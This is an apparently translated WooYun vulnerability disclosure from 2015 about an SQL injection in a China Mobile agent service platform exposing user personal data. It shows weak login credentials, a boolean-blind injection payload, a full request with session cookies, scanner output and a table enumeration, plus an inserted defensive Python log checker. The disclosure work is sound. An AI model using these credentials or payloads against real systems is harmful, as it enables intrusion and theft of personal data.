
Vulnerability summary

Defect ID: wooyun-2015-0150410

Title: SQL injection in an important China Mobile platform leaks detailed information on a large number of users (name / email / address / mobile number / QQ number, etc.)

Vendor: China Mobile

Author: Looke

Submitted: 2015-10-29 18:45

Fixed: 2015-12-17 15:28

Published: 2015-12-17 15:28

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-29: Details sent to the vendor; awaiting vendor response
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and domain experts
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public

Brief description:

See title.

Detailed description:

System: China Mobile Agent Server Unified Service Platform

http://**.**.**.**/


Weak credentials: username liuxin, password 123456
After logging in, the following link was found to be injectable:

http://**.**.**.**/newsview.asp?News_ID=9


Vulnerable request:

GET /newsview.asp?News_ID=9 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCQRRAQCC=GCGNBCGAGGPBPKAEFKGHPBHI; User%5FType=%D3%C3%BB%A7; User%5FID=1692; User%5FAccount=liuxin; NewsFlag=29


The News_ID parameter is injectable (scanner output below):

---
Parameter: News_ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: News_ID=9 AND 3394=3394
---
[17:12:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
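The root cause here is that News_ID reaches the query as a string, so a tautology such as "9 AND 3394=3394" is evaluated by SQL Server. The following is an added example (not from the report or the platform) of the defensive view of that fact: a small IIS W3C log checker that treats News_ID as an integer id and flags any request whose value is not a plain integer, and separately labels the boolean comparison probe shown above. The log lines, field layout and IP addresses are constructed; the parameter name and the probe value come from the report.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not taken from the report); the third and
# fourth entries carry the same boolean probe the scanner output above reports.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-10-29 17:10:01 GET /newsview.asp News_ID=9 203.0.113.7 200
2015-10-29 17:10:05 GET /index.asp - 203.0.113.7 200
2015-10-29 17:12:26 GET /newsview.asp News_ID=9+AND+3394%3D3394 203.0.113.7 200
2015-10-29 17:12:27 GET /newsview.asp News_ID=9+AND+3394%3D3395 203.0.113.7 200
2015-10-29 17:13:02 GET /newsview.asp News_ID=9%27 203.0.113.7 500
"""

INT_PARAMS = {"News_ID"}  # parameters the application defines as integer ids
COMPARISON = re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per entry, taking column names from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def query_params(raw):
    """Split an IIS cs-uri-query value ('-' means empty) into decoded key/value pairs."""
    if raw == "-":
        return {}
    return {k: unquote_plus(v) for k, _, v in (p.partition("=") for p in raw.split("&"))}

def classify(value):
    """Return None for a well-formed integer id, otherwise the reason it is suspicious."""
    if re.fullmatch(r"\d+", value):
        return None          # the only shape the application should ever accept
    if COMPARISON.search(value):
        return "boolean comparison probe"
    return "non-integer id"

def find_injection_probes(text):
    """Return (time, stem, param, decoded value, reason) for each suspicious request."""
    hits = []
    for entry in parse_w3c(text):
        for name, value in query_params(entry["cs-uri-query"]).items():
            if name in INT_PARAMS:
                reason = classify(value)
                if reason:
                    hits.append((entry["time"], entry["cs-uri-stem"], name, value, reason))
    return hits

if __name__ == "__main__":
    for hit in find_injection_probes(SAMPLE_LOG):
        print(*hit)
```

The same `classify` rule, applied to the parameter before it is used in the query, is the server-side validation that would have stopped the injection regardless of what the scanner sent.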

Proof of vulnerability:

Databases:

available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zps


Over twenty million records exposed:

Database: zps
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.MT20150512 | 1300631 |
| dbo.MT20150724 | 1216847 |
| dbo.MT20150521 | 1112351 |
| dbo.MT20150529 | 1104653 |
| dbo.MT20150520 | 1087323 |
| dbo.MT20150619 | 1078151 |
| dbo.MT20150814 | 1077438 |
| dbo.MT20150730 | 1065513 |
| dbo.MT20150930 | 1014321 |
| dbo.MT20150618 | 1002796 |
| dbo.MT20150605 | 943391 |
| dbo.MT20150925 | 941665 |
| dbo.MT20150820 | 917963 |
| dbo.MT20150522 | 875826 |
| dbo.Stat | 860200 |
| dbo.MT20150604 | 845547 |
| dbo.MT20150716 | 821092 |
| dbo.MT20150626 | 797548 |
| dbo.MT20150513 | 785944 |
| dbo.MT20150911 | 774978 |
| dbo.MT20150612 | 768985 |
| dbo.MT20150806 | 759100 |
| dbo.MT20150525 | 757955 |
| dbo.MT20150515 | 748140 |
| dbo.MT20150703 | 717539 |
| dbo.MT20150710 | 711096 |
| dbo.MT20150819 | 703292 |
| dbo.MT20150821 | 699784 |
| dbo.MT20150717 | 666628 |
| dbo.MT20150528 | 649976 |
| dbo.MT20150501 | 630256 |
| dbo.MT20150507 | 606188 |
| dbo.MT20150910 | 601285 |
| dbo.MT20150530 | 598854 |
| dbo.MT20150508 | 587658 |
| dbo.MT20150723 | 583387 |
| dbo.MT20150601 | 572061 |
| dbo.MT20150625 | 570554 |
| dbo.MT20150514 | 555043 |
| dbo.MT20150929 | 542677 |
| dbo.MT20150705 | 526571 |
| dbo.MT20150731 | 519889 |
| dbo.MT20150623 | 510131 |
| dbo.MT20150807 | 498585 |
| dbo.MT20150725 | 494786 |
| dbo.MT20150519 | 490501 |
| dbo.MT20150709 | 476383 |
| dbo.MT20150516 | 471334 |
| dbo.MT20150523 | 467576 |
| dbo.MT20150620 | 466131 |
| dbo.MT20150606 | 456222 |
| dbo.MT20150611 | 451591 |
| dbo.MT20150616 | 448405 |
| dbo.MT20150918 | 446117 |
| dbo.MT20151029 | 446050 |
| dbo.MT20150617 | 445359 |
| dbo.MT20150603 | 441944 |
| dbo.MT20150926 | 438594 |
| dbo.MT20150702 | 419481 |
| dbo.MT20150526 | 414403 |
| dbo.MT20150722 | 414216 |
| dbo.MT20150527 | 409097 |
| dbo.MT20151023 | 403022 |
| dbo.MT20150917 | 391099 |
| dbo.MT20150907 | 383748 |
| dbo.MT20150701 | 372585 |
| dbo.MT20150828 | 370820 |
| dbo.MT20150924 | 369880 |
| dbo.MT20150610 | 367191 |
| dbo.MT20150615 | 364051 |
| dbo.MT20150509 | 363048 |
| dbo.MT20150704 | 362277 |
| dbo.MT20150609 | 360586 |
| dbo.MT20150906 | 358841 |
| dbo.MT20150624 | 355980 |
| dbo.MT20151016 | 353044 |
| dbo.MT20150801 | 347919 |
| dbo.MT20150812 | 343406 |
| dbo.MT20151001 | 336112 |
| dbo.MT20150822 | 326996 |
| dbo.MT20150818 | 323604 |
| dbo.MT20150602 | 318139 |
| dbo.MT20150916 | 313292 |
| dbo.MT20150630 | 311439 |
| dbo.MT20150908 | 310660 |
| dbo.MT20150608 | 309429 |
| dbo.MT20150714 | 307381 |
| dbo.MT20150627 | 306443 |
| dbo.MT20150914 | 305100 |
| dbo.MT20150919 | 304626 |
| dbo.MT20150629 | 303031 |
| dbo.MT20150817 | 301790 |
| dbo.MT20150728 | 301428 |
| dbo.MT20150811 | 299258 |
| dbo.MT20150923 | 298486 |
| dbo.MT20150711 | 296465 |
| dbo.Finance | 294621 |
| dbo.MT20150524 | 292272 |
| dbo.MT20150909 | 291320 |
| dbo.MT20150506 | 290831 |
| dbo.MT20150511 | 286425 |
| dbo.MT20150707 | 285185 |
| dbo.MT20150721 | 284167 |
| dbo.MT20150813 | 281533 |
| dbo.MT20150824 | 273909 |
| dbo.MT20150518 | 271676 |
| dbo.MT20150815 | 267474 |
| dbo.MT20150708 | 265154 |
| dbo.MT20150808 | 259589 |
| dbo.MT20150531 | 256310 |
| dbo.MT20150720 | 251164 |
| dbo.MT20151022 | 251160 |
| dbo.MT20150504 | 248356 |
| dbo.MT20150706 | 246225 |
| dbo.MT20150502 | 245435 |
| dbo.MT20150827 | 238763 |
| dbo.MT20151008 | 234516 |
| dbo.MT20150805 | 231733 |
| dbo.MT20150613 | 231690 |
| dbo.MT20151014 | 231209 |
| dbo.MT20151020 | 229877 |
| dbo.MT20150928 | 227405 |
| dbo.MT20150921 | 222047 |
| dbo.MT20150729 | 221324 |
| dbo.MT20150727 | 220879 |
| dbo.MT20150803 | 217732 |
| dbo.MT20151015 | 215287 |
| dbo.MT20150718 | 211080 |
| dbo.MT20150829 | 210303 |
| dbo.MT20150712 | 210123 |
| dbo.MT20150922 | 209444 |
| dbo.MT20150719 | 206663 |
| dbo.MT20150505 | 206100 |
| dbo.MT20150804 | 204653 |
| dbo.MT20150510 | 204634 |
| dbo.MT20151009 | 202417 |
| dbo.MT20150715 | 197408 |
| dbo.MT20150621 | 195673 |
| dbo.MT20150816 | 193286 |
| dbo.MT20150927 | 190966 |
| dbo.MT20150713 | 189635 |
| dbo.MT20150517 | 189051 |
| dbo.MT20150826 | 185623 |
| dbo.MT20150726 | 184240 |
| dbo.MT20151027 | 183812 |
| dbo.MT20150810 | 181070 |
| dbo.MT20151017 | 170336 |
| dbo.MT20151012 | 165449 |
| dbo.MT20150825 | 165161 |
| dbo.MT20151021 | 163153 |
| dbo.MT20151024 | 163039 |
| dbo.MT20151019 | 162500 |
| dbo.MT20150622 | 160195 |
| dbo.MT20151026 | 157108 |
| dbo.MT20150607 | 155359 |
| dbo.MT20150915 | 153941 |
| dbo.MT20150912 | 153011 |
| dbo.MT20150830 | 152814 |
| dbo.MT20150503 | 149904 |
| dbo.MT20150823 | 149206 |
| dbo.MT20150920 | 143914 |
| dbo.MT20150614 | 135904 |
| dbo.Send | 133039 |
| dbo.MT20150802 | 126744 |
| dbo.MT20151010 | 122862 |
| dbo.MT20151013 | 120010 |
| dbo.MT20151028 | 119794 |
| dbo.Customer | 115709 |
| dbo.MT20151018 | 112197 |
| dbo.MT20151003 | 111246 |
| dbo.MT20150809 | 103169 |
| dbo.MT20150831 | 93620 |
| dbo.MT20150628 | 87142 |
| dbo.MT20150913 | 86647 |
| dbo.MT20151006 | 85695 |
| dbo.MT20151002 | 85216 |
| dbo.MT20151025 | 83901 |
| dbo.Log | 72479 |
| dbo.MT20151004 | 62265 |
| dbo.MT20151005 | 59134 |
| dbo.MT20151011 | 55722 |
| dbo.MT20151007 | 53971 |
| dbo.Recv | 42201 |
| dbo.MT20150904 | 42055 |
| dbo.MT20150902 | 17847 |
| dbo.MT20150905 | 15111 |
| dbo.MT20150903 | 9977 |
| dbo.UserChannel | 7011 |
| dbo.MT20150901 | 4785 |
| dbo.BlackList1 | 2992 |
| dbo.Admin | 543 |
| dbo.Draft | 282 |
| dbo.DraftType | 178 |
| dbo.Badwords | 27 |
| dbo.ChannelSend | 18 |
| dbo.CycleSend | 16 |
| dbo.Channel | 1 |
| dbo.News | 1 |
| dbo.Setting | 1 |
+-----------------------------+---------+
Database: msdb
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.syspolicy_configuration | 4 |
+-----------------------------+---------+


Detailed information on 110,000 users: name, gender, address, mobile number, fax, QQ, email

[screenshot: 11W用户信息.png]


I did not dump the database, for fear of a visit from the authorities; I stopped at proof of concept.

Suggested fix:

@@

Copyright notice: please credit the source when reposting: Looke@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-02 15:27

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to China Mobile Group, which will coordinate handling with the website's administration department.

Latest status:

None yet